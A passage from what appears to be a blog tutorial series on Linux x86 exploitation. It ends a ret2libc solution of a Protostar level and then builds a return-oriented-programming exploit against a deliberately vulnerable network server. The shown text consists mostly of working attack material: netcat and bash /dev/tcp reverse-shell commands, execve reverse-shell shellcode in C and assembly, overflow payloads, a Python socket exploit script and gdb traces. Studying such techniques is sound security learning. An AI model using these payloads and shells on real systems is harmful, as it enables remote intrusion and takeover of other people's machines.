class="p"gt;:/span/span span class="code-line"span class="x" 8048560: 55 push ebp/span/span span class="code-line"span class="x" 8048561: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048563: 5d pop ebp/span/span span class="code-line"span class="x" 8048564: c3 ret /span/span span class="code-line"span class="x" 8048565: 8d 74 26 00 lea esi,[esi+eiz*1+0x0]/span/span span class="code-line"span class="x" 8048569: 8d bc 27 00 00 00 00 lea edi,[edi+eiz*1+0x0]/span/span span class="code-line"/span span class="code-line"span class="mh"08048570/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__libc_csu_init/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048570: 55 push ebp/span/span span class="code-line"span class="x" 8048571: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048573: 57 push edi/span/span span class="code-line"span class="x" 8048574: 56 push esi/span/span span class="code-line"span class="x" 8048575: 53 push ebx/span/span span class="code-line"span class="x" 8048576: e8 4f 00 00 00 call 80485ca lt;__i686.get_pc_thunk.bxgt;/span/span span class="code-line"span class="x" 804857b: 81 c3 c1 11 00 00 add ebx,0x11c1/span/span span class="code-line"span class="x" 8048581: 83 ec 1c sub esp,0x1c/span/span span class="code-line"span class="x" 8048584: e8 cb fd ff ff call 8048354 lt;_initgt;/span/span span class="code-line"span class="x" 8048589: 8d bb 18 ff ff ff lea edi,[ebx-0xe8]/span/span span class="code-line"span class="x" 804858f: 8d 83 18 ff ff ff lea eax,[ebx-0xe8]/span/span span class="code-line"span class="x" 8048595: 29 c7 sub edi,eax/span/span span class="code-line"span class="x" 8048597: c1 ff 02 sar edi,0x2/span/span span class="code-line"span class="x" 804859a: 85 ff test edi,edi/span/span span class="code-line"span class="x" 804859c: 74 24 je 80485c2 lt;__libc_csu_init+0x52gt;/span/span span class="code-line"span class="x" 804859e: 31 f6 xor esi,esi/span/span span class="code-line"span class="x" 80485a0: 8b 45 10 mov eax,DWORD PTR [ebp+0x10]/span/span span class="code-line"span class="x" 80485a3: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 80485a7: 8b 45 0c mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="x" 80485aa: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 80485ae: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 80485b1: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 80485b4: ff 94 b3 18 ff ff ff call DWORD PTR [ebx+esi*4-0xe8]/span/span span class="code-line"span class="x" 80485bb: 83 c6 01 add esi,0x1/span/span span class="code-line"span class="x" 80485be: 39 fe cmp esi,edi/span/span span class="code-line"span class="x" 80485c0: 72 de jb 80485a0 lt;__libc_csu_init+0x30gt;/span/span span class="code-line"span class="x" 80485c2: 83 c4 1c add esp,0x1c/span/span span class="code-line"span class="x" 80485c5: 5b pop ebx/span/span span class="code-line"span class="x" 80485c6: 5e pop esi/span/span span class="code-line"span class="x" 80485c7: 5f pop edi/span/span span class="code-line"span class="x" 80485c8: 5d pop ebp/span/span span class="code-line"span class="x" 80485c9: c3 ret /span/span span class="code-line"/span span class="code-line"span class="mh"080485ca/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__i686.get_pc_thunk.bx/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80485ca: 8b 1c 24 mov ebx,DWORD PTR [esp]/span/span span class="code-line"span class="x" 80485cd: c3 ret /span/span span class="code-line"span class="x" 80485ce: 90 nop/span/span span class="code-line"span class="x" 80485cf: 90 nop/span/span span class="code-line"/span span class="code-line"span class="mh"080485d0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__do_global_ctors_aux/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80485d0: 55 push ebp/span/span span class="code-line"span class="x" 80485d1: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 80485d3: 53 push ebx/span/span span class="code-line"span class="x" 80485d4: 83 ec 04 sub esp,0x4/span/span span class="code-line"span class="x" 80485d7: a1 54 96 04 08 mov eax,ds:0x8049654/span/span span class="code-line"span class="x" 80485dc: 83 f8 ff cmp eax,0xffffffff/span/span span class="code-line"span class="x" 80485df: 74 13 je 80485f4 lt;__do_global_ctors_aux+0x24gt;/span/span span class="code-line"span class="x" 80485e1: bb 54 96 04 08 mov ebx,0x8049654/span/span span class="code-line"span class="x" 80485e6: 66 90 xchg ax,ax/span/span span class="code-line"span class="x" 80485e8: 83 eb 04 sub ebx,0x4/span/span span class="code-line"span class="x" 80485eb: ff d0 call eax/span/span span class="code-line"span class="x" 80485ed: 8b 03 mov eax,DWORD PTR [ebx]/span/span span class="code-line"span class="x" 80485ef: 83 f8 ff cmp eax,0xffffffff/span/span span class="code-line"span class="x" 80485f2: 75 f4 jne 80485e8 lt;__do_global_ctors_aux+0x18gt;/span/span span class="code-line"span class="x" 80485f4: 83 c4 04 add esp,0x4/span/span span class="code-line"span class="x" 80485f7: 5b pop ebx/span/span span class="code-line"span class="x" 80485f8: 5d pop ebp/span/span span class="code-line"span class="x" 80485f9: c3 ret /span/span span class="code-line"span class="x" 80485fa: 90 nop/span/span span class="code-line"span class="x" 80485fb: 90 nop/span/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".fini/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"080485fc/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"_fini/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80485fc: 55 push ebp/span/span span class="code-line"span class="x" 80485fd: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 80485ff: 53 push ebx/span/span span class="code-line"span class="x" 8048600: 83 ec 04 sub esp,0x4/span/span span class="code-line"span class="x" 8048603: e8 00 00 00 00 call 8048608 lt;_fini+0xcgt;/span/span span class="code-line"span class="x" 8048608: 5b pop ebx/span/span span class="code-line"span class="x" 8048609: 81 c3 34 11 00 00 add ebx,0x1134/span/span span class="code-line"span class="x" 804860f: e8 2c fe ff ff call 8048440 lt;__do_global_dtors_auxgt;/span/span span class="code-line"span class="x" 8048614: 59 pop ecx/span/span span class="code-line"span class="x" 8048615: 5b pop ebx/span/span span class="code-line"span class="x" 8048616: c9 leave /span/span span class="code-line"span class="x" 8048617: c3 ret/span/span span class="code-line"/code/pre/div /td/tr/table pOK, so the codepop, ret/code starts at code0x80485f8/code and the coderet/code is at code0x80485f9/code./p pNow we just need to create the environment variable and find it in memory:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:/opt/protostar/bin$ /spanspan class="nb"export/span span class="nv"NCCMD/spanspan class="o"=/spanspan class="s2"quot;nc -e /bin/bash 127.0.0.1 9000quot;/span/span span class="code-line"/code/pre/div /td/tr/table pTo find out where it will be in memory I'm going to use the same a href="/assets/code/x86-32-linux/getenvaddr.c"C application/a that I've used before, which uses codegetenv/code to work it out:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:/opt/protostar/bin$ /spangcc -o /tmp/env /tmp/env.c/span span class="code-line"span class="gp"user@protostar:/opt/protostar/bin$ /span/tmp/env/span span class="code-line"span class="go"Usage: /tmp/env lt;environment variablegt; lt;target program namegt;/span/span span class="code-line"span class="gp"user@protostar:/opt/protostar/bin$ /span/tmp/env NCCMD ./stack7/span span class="code-line"span class="go"NCCMD will be at 0xbfffff6e/span/span span class="code-line"/code/pre/div /td/tr/table pWe know that the distance from the start of the payload to overwriting the return address will be the same as before because the application is identical in that sense./p pNow we have all of the information to exploit it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:~$ /spannc -l -p span class="m"9000/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:/opt/protostar/bin$ /spanpython -c span class="s1"#39;print quot;Aquot;*80 + quot;\xf9\x85\x04\x08quot; + quot;\x80\xec\xf2\xb7quot; + quot;\xf8\x85\x04\x08quot; + quot;\x00\x00\x00\x00quot; + quot;\xb0\xff\xec\xb7quot; + quot;JUNKquot; + quot;\x6e\xff\xff\xbfquot;#39;/span span class="p"|/span ./stack7/span span class="code-line"span class="go"input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA��������/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"pwd/span/span span class="code-line"span class="go"/opt/protostar/bin/span/span span class="code-line"span class="go"whoami/span/span span class="code-line"span class="go"root/span/span span class="code-line"/code/pre/div /td/tr/table pPWNED! :-)/p h2Conclusion/h2 pThere are normally a number of ways to exploit a single vulnerablity so while you are learning it is best to try to exploit it in as many ways as possible because some might work in some situations while others might not./p pRet2Libc is very powerful and beats NX completely but ROP is even more powerful and providing there are enough different ROP gadgets, you can create the whole shellcode using nothing but ROP gadgets but this requires the application to be quite big./p h2Further Reading/h2 pFor more indepth information about Ret2Libc see a href="http://phrack.org/issues/58/4.html" target="_blank"this/a article on phrack./p pRead emHacking: The Art Of Exploitation/em by emJon Erickson/em for more information about all of the attacks I've discussed so far and more./p

So far we've only beat either ASLR or NX seperately, now I will demonstrate how to beat both of these protections at the same time.

To do this I will use ROP (Return-oriented programming). We've seen ROP briefly in the last post but now we will use it alot more extensively.

ROP itself is a very simple idea, in situations where its impossible to run your own code, you use the code already in the application to do what you want it to do.

As we saw in the post about beating ASLR with full ASLR enabled the only section that is static is the text segment which contains the applications own code.

The "Return to Libc" method won't work because dynamically loaded libraries aren't at the same segment of memory as the applications code so we can no longer predict what memory addresses these functions (or pointers to the functions) will be at.

Normal shellcode will not run because NX is enabled.

So we have to find a way to run our own code by using only the code which is always loaded at the same address in memory.

Its worth noting that every ROP exploit will be remarkably different, this is because we can only use the applications own code and every applications code is different, so the important thing to learn in this post is the methodlogy that I will use to build the exploit.

I will assume that you have an indepth knowledge of the IA32 architecture and how the calling convention used by Linux (cdecl) works.

The App

The application we will be attacking is the same application as in the beating ASLR post.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109

#include <sys/socket.h> #include <netinet/in.h> #include <stdio.h> #include <strings.h> #include <stdlib.h> #include <string.h> #define PASS "topsecretpassword" #define CNUM 58623 #define SFILE "secret.txt" #define TFILE "token" #define PORT 9999 void sendfile(int connfd, struct sockaddr_in cliaddr); void senderror(int connfd, struct sockaddr_in cliaddr, char p[]); void sendtoken(int connfd, struct sockaddr_in cliaddr); int checkpass(char *p); void main() { int listenfd, connfd, n, c, r; struct sockaddr_in servaddr, cliaddr; socklen_t clilen; pid_t childpid; char pwd[4096]; listenfd=socket(AF_INET,SOCK_STREAM,0); bzero(&servaddr,sizeof(servaddr)); servaddr.sin_family = AF_INET; servaddr.sin_addr.s_addr=htonl(INADDR_ANY); servaddr.sin_port=htons(PORT); if ((r = bind(listenfd,(struct sockaddr *)&servaddr,sizeof(servaddr))) != 0) { printf("Error: Unable to bind to port %d\n", PORT); exit(1); } listen(listenfd,1024); for(;;) { clilen=sizeof(cliaddr); connfd = accept(listenfd,(struct sockaddr *)&cliaddr,&clilen); n = recvfrom(connfd, pwd, 4096, 0, (struct sockaddr *)&cliaddr, &clilen); pwd[n] = '\0'; r = checkpass(pwd); if (r != 0) if (r != 5) senderror(connfd, cliaddr, pwd); else sendtoken(connfd, cliaddr); else sendfile(connfd, cliaddr); printf("Received the following:\n"); printf("%s", pwd); close(connfd); } } void sendfile(int connfd, struct sockaddr_in cliaddr) { FILE *f; int c; f = fopen(SFILE, "r"); if (f) { while ((c = getc(f)) != EOF) sendto(connfd, &c, 1, 0, (struct sockaddr *)&cliaddr,sizeof(cliaddr)); fclose(f); } else { printf("Error opening file: " SFILE "\n"); exit(1); } } void senderror(int connfd, struct sockaddr_in cliaddr, char p[]) { sendto(connfd, "Wrong password: ", 16 , 0, (struct sockaddr *)&cliaddr,sizeof(cliaddr)); sendto(connfd, p, strlen(p), 0, (struct sockaddr *)&cliaddr,sizeof(cliaddr)); } void sendtoken(int connfd, struct sockaddr_in cliaddr) { FILE *f; int c; f = fopen(TFILE, "r"); if (f) { while ((c = getc(f)) != EOF) sendto(connfd, &c, 1, 0, (struct sockaddr *)&cliaddr,sizeof(cliaddr)); fclose(f); } else { printf("Error opening file: " TFILE "\n"); exit(1); } } int checkpass(char *a) { char p[512]; int r, i; strncpy(p, a, strlen(a)+1); i = atoi(p); if (i == CNUM) r = 5; else r = strcmp(p, PASS); return r; }

The only thing I've changed here is the size of the input accepted by the server (from 1000 to 4096). This is because the payload I need to send is larger than 1000 bytes.

Setting Up The Environment

Because the application that we are attacking is so small, we need to compile it with the -static flag, this will compile any libraries into the binary making for a larger text segment:

1 2 3

testuser@dev:~$ gcc -o app-net app-net.c -static testuser@dev:~$ cat /proc/sys/kernel/randomize_va_space 2

Its important to use the -static flag, firstly because you won't have enough ROP gadgets to write the exploit otherwise and because nearly all real world applications are much bigger than this small 1 so compiling it with the libraries static will make it more realistic.

If you don't get 2 from /proc/sys/kernel/randomize_va_space then run (as root):

1	root@dev:~# echo 2 > /proc/sys/kernel/randomize_va_space

Getting Gadgets

To build a ROP exploit you need to find ROP gadgets.

A ROP gadget is 1 or more assembly instructions followed by a ret (or return) instruction.

Finding these gadgets would be painful and slow manually so we will use an already avaliable tool ROPgadget by Jonathan Salwan of Shell Storm.

You can download the tool using git:

1 2 3 4 5 6

testuser@dev:~$ git clone https://github.com/JonathanSalwan/ROPgadget.git Cloning into 'ROPgadget'... remote: Counting objects: 3031, done. remote: Total 3031 (delta 0), reused 0 (delta 0) Receiving objects: 100% (3031/3031), 10.08 MiB | 2.03 MiB/s, done. Resolving deltas: 100% (1828/1828), done.

This script looks for all ROP gadgets in the application code and outputs them, there will be alot of output so redirect the output to a file to search through later:

1	testuser@dev:~$ ROPgadget/ROPgadget.py --binary app-net > gadgets

The file (gadgets) will contain lines in the form of:

[memory address] : [series of instructions at that address]

The first thing I looked for is an int 0x80 followed by a ret:

1	testuser@dev:~$ grep 'int 0x80' gadgets | grep 'ret'

There are none, this means we will have to do the attack in 1 syscall.

You can download the full list of ROP gadgets that I got here.

Testing New Shellcode

All of the shellcode I've written until now used multiple syscalls, we aren't able to do that now so we need 1 syscall that is useful for us.

To do this I will use the bash 1 liner here:

1	bash -i >& /dev/tcp/127.0.0.1/8000 0>&1

As before, although I'm doing everything over the loopback interface for ease and convenience, this could be done to any IP address.

I will use the execve syscall for this, in C this would look like:

1 2 3 4 5 6 7 8 9 10

#include <unistd.h> int main(int argc, char **argv) { char *filename = "/bin/bash"; char *arg1 = "-c"; char *arg2 = "/bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1"; char *args[] = { filename, arg1, arg2 }; execve(args[0], &args[0], 0); }

Using this, and already knowing (from previous posts) that the syscall number for execve is 11, we can create the same code in assembly and shellcode, first we need the strings in hex and backwards (because of the little endian architecture).

For this I will use a little python script I wrote:

1 2 3 4 5 6 7 8 9 10 11 12

#!/usr/bin/env python import sys string = sys.argv[1] print 'Length: ' + str(len(string)) print 'Reversed: ' + string[::-1] print 'And HEX\'d: ' + string[::-1].encode('hex') sys.exit(0)

Now we can just run this script with each of our strings as an argument:

1 2 3 4 5 6 7 8 9 10 11 12

testuser@dev:~$ python reverse-n-hex.py '/bin/bash' Length: 9 Reversed: hsab/nib/ And HEX'd: 687361622f6e69622f testuser@dev:~$ python reverse-n-hex.py '-c' Length: 2 Reversed: c- And HEX'd: 632d testuser@dev:~$ python reverse-n-hex.py '/bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1' Length: 44 Reversed: 1&>0 0008/1.0.0.721/pct/ved/ &> i- hsab/nib/ And HEX'd: 31263e3020303030382f312e302e302e3732312f7063742f7665642f20263e20692d20687361622f6e69622f

Now we can build the shellcode in assembly:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51

global _start section .text _start: ; zero eax for the nulls xor eax, eax ; free some space on the stack ; so we don't overwrite bits of our shellcode sub esp, 0x60 ; setup the first argument string on the stack push eax push 0x68736162 push 0x2f6e6962 push 0x2f2f2f2f ; move the address of this string into ebx mov ebx, esp ; setup the third argument on the stack push eax push 0x31263e30 push 0x20303030 push 0x382f312e push 0x302e302e push 0x3732312f push 0x7063742f push 0x7665642f push 0x20263e20 push 0x692d2068 push 0x7361622f push 0x6e69622f ; move the address of the thrid argument string into esi for later mov esi, esp ; setup the second argument string on the stack push eax push word 0x632d ; move the address of the second argument string into edi for later mov edi, esp ; setup the "argv[]" argument on the stack push eax push esi push edi push ebx ; move the address of the "argv[]" argument into ecx mov ecx, esp ; setup edx to point to null push eax mov edx, esp ; move 11 into eax add al, 0xb ; initiate the syscall int 0x80

You can test this shellcode the way we have tested shellcode in the past, I won't do that because this post will be long enough anyway, just remember to use netcat to start listening because this will do a reverse shell connecting back to 127.0.0.1 on port 8000.

Searching Through The Gadgets

Now we know how the registers need to be setup when we execute the syscall we can go about searching through the avaliable gadgets to see what registers we have a lot of control of and what registers are more difficult to manipulate.

We can search the gadgets file with regex, like this:

1 2 3 4 5 6 7 8 9 10 11 12 13 14

testuser@dev:~$ grep ' ecx, e[a-z][a-z]' gadgets | grep 'ret$' 0x08048207 : add eax, 0x80cb080 ; add ecx, ecx ; ret 0x0806cdbc : add ecx, eax ; mov eax, ecx ; pop ebx ; pop esi ; pop ebp ; ret 0x0804820c : add ecx, ecx ; ret 0x08056504 : and edx, 3 ; mov ecx, edx ; rep stosb byte ptr es:[edi], al ; pop edi ; pop ebp ; ret 0x080748f8 : cmp ecx, eax ; jb 0x8074910 ; sub eax, ebx ; pop ebx ; pop ebp ; ret 0x0806cdba : div ebx ; add ecx, eax ; mov eax, ecx ; pop ebx ; pop esi ; pop ebp ; ret 0x08056505 : loop 0x8056512 ; mov ecx, edx ; rep stosb byte ptr es:[edi], al ; pop edi ; pop ebp ; ret 0x0804dca2 : mov ecx, eax ; mov eax, dword ptr [eax] ; test eax, eax ; jne 0x804dca1 ; pop ebp ; ret 0x08056507 : mov ecx, edx ; rep stosb byte ptr es:[edi], al ; pop edi ; pop ebp ; ret 0x080748f7 : nop ; cmp ecx, eax ; jb 0x8074911 ; sub eax, ebx ; pop ebx ; pop ebp ; ret 0x0804820a : or al, 8 ; add ecx, ecx ; ret 0x08084b36 : or ecx, ecx ; ret 0x0804f539 : xor ecx, edi ; mov byte ptr [eax + edx], cl ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret

The search above searches for any gadgets that use the ecx register as the source operand.

We also use grep 'ret$' at the end because we are only interested in gadgets that end with a ret instruction (it also shows gadgets that end in int 0x80 otherwise).

After searching through the gadgets for a while it becomes obvious that the ecx register is 1 of the more difficult to manipulate, so we will use the eax, ebx and edx registers to manipulate the data and we want to sort out the final value of ecx near the start of the exploit.

While searching through the gadgets, it would be helpful to paste what look to be the most useful gadgets into a seperate file so that you don't have to keep searching through the full list of gadgets.

Building The ROP Exploit

We are going to run into a few major problems while building this exploit.

Firstly, as I already mentioned ecx manipulation is highly restrictive.

Secondly, we are unable to send nulls (0x0) so we will need to put in placeholders and change their value in memory during runtime.

Lastly, we have no idea of any memory addresses within the payload that we will send, so we will have to calulate them during runtime also so that we can reference certain parts of our payload for various reasons.

Because our main 2 problems are to do with values within our payload and because we are unable to exploit this without being able to reference values within our payload we need to approach this problem first.

We do this by getting any address within our payload and calculating the rest of the addresses relative to that address.

The easiest way to do this is by getting the value of esp which, throughout our exploit, will point to a certain part of the payload.

There are various ways to do this (eg. by finding a mov [reg], esp, add [reg], esp) but we will use the following push, pop sequence to get the value of esp into ebp:

1	0x0807715a : push esp ; mov eax, dword ptr [0x80ccbcc] ; pop ebp ; ret

And then move the value of ebp into eax:

1	0x080525d0 : xchg eax, ebp ; ret

Because eax is the most used register in our avaliable ROP gadgets, its handy to be able to move values into eax for further processing.

Analysing The Exploit

Its important to analyse this exploit throughout the development of the exploit because of the complexity of it.

The methodology that I will use here you will need to use thoroughly while developing the exploit.

First we write a python exploit containing the 2 ROP gadgets we have found so far:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21

#!/usr/bin/env python import socket payload = "A" * 532 payload += "\x5a\x71\x07\x08" # ebp = esp payload += "\xd0\x25\x05\x08" # xchg eax, ebp # create the tcp socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # connect to 127.0.0.1 port 9999 s.connect(("127.0.0.1", 9999)) # send our payload s.send(payload) # close the socket s.close()

All this is doing is sending 532 A's to overflow the buffer until we start overwriting the return address.

Then we open the vulnerable application using gdb and run the exploit against it:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56

appuser@dev:~$ gdb -q ./app-net Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done. (gdb) set disassembly-flavor intel (gdb) disassemble checkpass Dump of assembler code for function checkpass: 0x08048674 <+0>: push ebp 0x08048675 <+1>: mov ebp,esp 0x08048677 <+3>: sub esp,0x228 0x0804867d <+9>: mov eax,DWORD PTR [ebp+0x8] 0x08048680 <+12>: mov DWORD PTR [esp],eax 0x08048683 <+15>: call 0x8055600 <strlen> 0x08048688 <+20>: add eax,0x1 0x0804868b <+23>: mov DWORD PTR [esp+0x8],eax 0x0804868f <+27>: mov eax,DWORD PTR [ebp+0x8] 0x08048692 <+30>: mov DWORD PTR [esp+0x4],eax 0x08048696 <+34>: lea eax,[ebp-0x210] 0x0804869c <+40>: mov DWORD PTR [esp],eax 0x0804869f <+43>: call 0x80556b0 <strncpy> 0x080486a4 <+48>: lea eax,[ebp-0x210] 0x080486aa <+54>: mov DWORD PTR [esp],eax 0x080486ad <+57>: call 0x8048eb0 <atoi> 0x080486b2 <+62>: mov DWORD PTR [ebp-0x10],eax 0x080486b5 <+65>: cmp DWORD PTR [ebp-0x10],0xe4ff 0x080486bc <+72>: jne 0x80486c7 <checkpass+83> 0x080486be <+74>: mov DWORD PTR [ebp-0xc],0x5 0x080486c5 <+81>: jmp 0x80486e0 <checkpass+108> 0x080486c7 <+83>: mov DWORD PTR [esp+0x4],0x80ab924 0x080486cf <+91>: lea eax,[ebp-0x210] 0x080486d5 <+97>: mov DWORD PTR [esp],eax 0x080486d8 <+100>: call 0x80555c0 <strcmp> 0x080486dd <+105>: mov DWORD PTR [ebp-0xc],eax 0x080486e0 <+108>: mov eax,DWORD PTR [ebp-0xc] 0x080486e3 <+111>: leave 0x080486e4 <+112>: ret End of assembler dump. (gdb) break *0x080486e4 Breakpoint 1 at 0x80486e4 (gdb) define hook-stop Type commands for definition of "hook-stop". End with a line saying just "end". >x/10xw $esp >x/i $eip >end (gdb) display/x $ebp (gdb) display/x $eax (gdb) run Starting program: /home/appuser/app-net 0xbfffe73c: 0x0807715a 0x080525d0 0xbfffe700 0x00001000 0xbfffe74c: 0x00000000 0xbffff770 0xbffff76c 0x00000000 0xbfffe75c: 0x00000000 0x00000000 => 0x80486e4 <checkpass+112>: ret Breakpoint 1, 0x080486e4 in checkpass () 2: /x $eax = 0xffffffcd 1: /x $ebp = 0x41414141 (gdb)

Firstly, on line 4, I disassemble the checkpass function, this is the vulnerable function so our exploit gets triggered when this function returns (runs its ret instruction).

We need to set a breakpoint at the address of this ret instruction (0x080486e4 on line 34 and set on line 36) so that we can trace through and observe the values of the registers as our exploit runs.

Lines 38 to 43, I define a function that runs every time execution stops, this just give us the top 10 values on the stack (as referenced by esp) and the current instruction to be run (as referenced by eip).

Next, on lines 44 and 45, I instruct gdb to display the values of the ebp and eax registers, this will also run every time execution stops, these are the 2 registers we are manipulating with our first 2 gadgets.

Lastly I run the application and when I launch the exploit breakpoint 1 is reached (on line 53).

As you can see, from line 51, eip now points to the ret instruction at the end of the checkpass function, which is where our exploit begins.

The current values of eax and ebp are 0xffffffcd and 0x41414141 respectively.

Looking at the output of x/10xw $esp, which just prints the top 10 values on the stack, the first value is 0x0807715a (just the address of our first gadget) and the second is 0x080525d0 (which is the address of our second gadget).

After the second gadget is run eax should contain 0xbfffe740 (0xbfffe73c + 0x4).

Now we just trace through the next few instructions using the stepi gdb command:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43

(gdb) stepi Cannot access memory at address 0x41414145 (gdb) stepi 0xbfffe73c: 0xbfffe740 0x080525d0 0xbfffe700 0x00001000 0xbfffe74c: 0x00000000 0xbffff770 0xbffff76c 0x00000000 0xbfffe75c: 0x00000000 0x00000000 => 0x807715b <__tzname_max+59>: mov eax,ds:0x80ccbcc 0x0807715b in __tzname_max () 2: /x $eax = 0xffffffcd 1: /x $ebp = 0x41414141 (gdb) stepi 0xbfffe73c: 0xbfffe740 0x080525d0 0xbfffe700 0x00001000 0xbfffe74c: 0x00000000 0xbffff770 0xbffff76c 0x00000000 0xbfffe75c: 0x00000000 0x00000000 => 0x8077160 <__tzname_max+64>: pop ebp 0x08077160 in __tzname_max () 2: /x $eax = 0x0 1: /x $ebp = 0x41414141 (gdb) stepi 0xbfffe740: 0x080525d0 0xbfffe700 0x00001000 0x00000000 0xbfffe750: 0xbffff770 0xbffff76c 0x00000000 0x00000000 0xbfffe760: 0x00000000 0x00000000 => 0x8077161 <__tzname_max+65>: ret 0x08077161 in __tzname_max () 2: /x $eax = 0x0 1: /x $ebp = 0xbfffe740 (gdb) stepi 0xbfffe744: 0xbfffe700 0x00001000 0x00000000 0xbffff770 0xbfffe754: 0xbffff76c 0x00000000 0x00000000 0x00000000 0xbfffe764: 0x00000000 0x00000000 => 0x80525d0 <_int_malloc+2832>: xchg ebp,eax 0x080525d0 in _int_malloc () 2: /x $eax = 0x0 1: /x $ebp = 0xbfffe740 (gdb) stepi 0xbfffe744: 0xbfffe700 0x00001000 0x00000000 0xbffff770 0xbfffe754: 0xbffff76c 0x00000000 0x00000000 0x00000000 0xbfffe764: 0x00000000 0x00000000 => 0x80525d1 <_int_malloc+2833>: ret 0x080525d1 in _int_malloc () 2: /x $eax = 0xbfffe740 1: /x $ebp = 0x0 (gdb)

So this worked as expected and we now have the address of our second ROP gadget inside eax.

All other addresses can be worked our relative to the address that we currently have.

Calculating An Address

The data that we need to reference we will put at the end of our payload.

Once we have the exploit almost complete we will know the length of our payload but until then we will write the exploit with an arbirary value and change it later.

For this we will use 1000 as the length from the second ROP gadget (the address we just retrieved from esp) to the start of our data.

Next we have to figure out how we will arrange the data at the end of the payload, this will allow us to work out the distances between the different sections of data so that the only value that will need to be changed is the first that we calculate. This will become more clear as we develop more of the exploit.

We need 4 different parts in the data section, the 3 strings and the pointers for the second argument to execve.

Here is how I've laid out the data:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27

------------------------data------------------------ ------------------------strings--------------------- 0x2f2f2f2f : ////bin/bash 0x2f6e6962 0x68736162 0xffffffff -------------------------------------------------- 0x632dffff : -c 0xffffffff -------------------------------------------------- 0x6e69622f : /bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1 0x7361622f 0x692d2068 0x20263e20 0x7665642f 0x7063742f 0x3732312f 0x302e302e 0x382f312e 0x20303030 0x31263e30 0xffffffff -------------------------pointers------------------- 0xbbbbbbbb : pointer to ////bin/bash 0xcccccccc : pointer to -c 0xdddddddd : pointer to args 0xffffffff

I've used 0xffffffff to represent where we want null bytes, these will have to be overwritten during runtime. We will also need to overwrite the pointers with the correct values at runtime, for now I've just put the placeholders 0xbbbbbbbb, 0xcccccccc and 0xdddddddd so that we can easily tell where we are while debugging the exploit.

It's also worth noting that because we are writing up the stack from lower down, the strings will be in normal order, there is no need to think about little endianness for them.

There is technically no reason to use ////bin/bash instead of /bin/bash here, like there was when writing the shellcode, but it rounds this up to 4 bytes so addresses will be slightly easier to calculate (this is 1 place this exploit could be optimized to reduce the size).

Now we need to calculate the address of the last value in our data (0xffffffff at the bottom)

There are 22 double words (a double word is 4 bytes) in the data, so 22 * 4 = 88, therefore we have 88 bytes from the top of our data to the end, as we are using 1000 bytes as a placeholder, for the length from the address we currently have to the top of the data, there are 1088 bytes we need to add to the address we got from esp in our first gadget.

